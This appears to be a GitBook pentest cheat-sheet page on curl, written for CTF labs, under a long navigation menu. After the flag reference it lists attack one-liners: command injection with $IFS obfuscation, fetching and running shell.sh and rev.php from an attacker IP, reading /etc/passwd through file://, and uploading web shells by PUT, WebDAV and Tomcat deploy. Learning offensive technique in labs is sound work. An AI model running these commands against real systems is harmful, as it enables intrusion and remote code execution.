Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  1. Other

Curl

  • Common commands

#   -d, --data            HTTP POST data
#   -f, --fail            Fail silently (no output at all) on HTTP errors
#   -i, --include         Include protocol response headers in the output
#   -o, --output          Write to file instead of stdout
#   -O, --remote-name     Write output to a file named as the remote file
#   -s, --silent          Silent mode
#   -T, --upload-file     Transfer local FILE to destination
#   -A, --user-agent      Send User-Agent <name> to server
#   -v, --verbose         Make the operation more talkative
#   -V, --version         Show version number and quit
#   -u, --user <user:password>  Server user and password

## ------------------| REST API
curl -s -X GET -G "http://10.10.178.30:31331/ping" --data-urlencode 'ip= `man cat`'

## ------------------| Download file
curl http://10.10.14.26/shell.sh -o /tmp/shell.sh

## ------------------| Read local files
curl file:///etc/passwd

## ------------------| Execute commands
curl http://10.10.14.26/$(whoami)
curl http://10.10.14.26/$(which$IFS'curl')
curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/var/www/html/rev.php'$IFS'http://10.10.14.26/rev.php')   

curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/tmp/shell.sh'$IFS'http://10.10.14.26/shell.sh')
curl http://10.10.14.26/$(bash$IFS/tmp/shell.sh)
  • Use PUT command to upload file

curl -X PUT http://10.10.10.15/h4rithd.html -d @shell.aspx
curl -X PUT http://10.10.10.15/harith.txt --data-binary @cmdasp.aspx

# If DEV available ?
curl -u 'username:password' --upload-file shell.php http://10.10.10.67/webdav_test_inception/shell.php 
curl -u 'username:password' -X PUT http://10.10.10.67/webdav_test_inception/shell.php --data-binary @shell.php        

# Upload war file to tomcat
curl -u 'username:password' -T shell.war http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd       

  • Use MOVE command to move file

curl -X MOVE http://10.10.10.15/h4rithd.html -H 'Destination:http://10.10.10.15/h4rithd.aspx'
  • .curlrc file

## ------------------| Setup proxy
proxy = http://127.0.0.1:8080        
PreviousHackerGPTNextHints!!

Last updated 1 year ago

🔄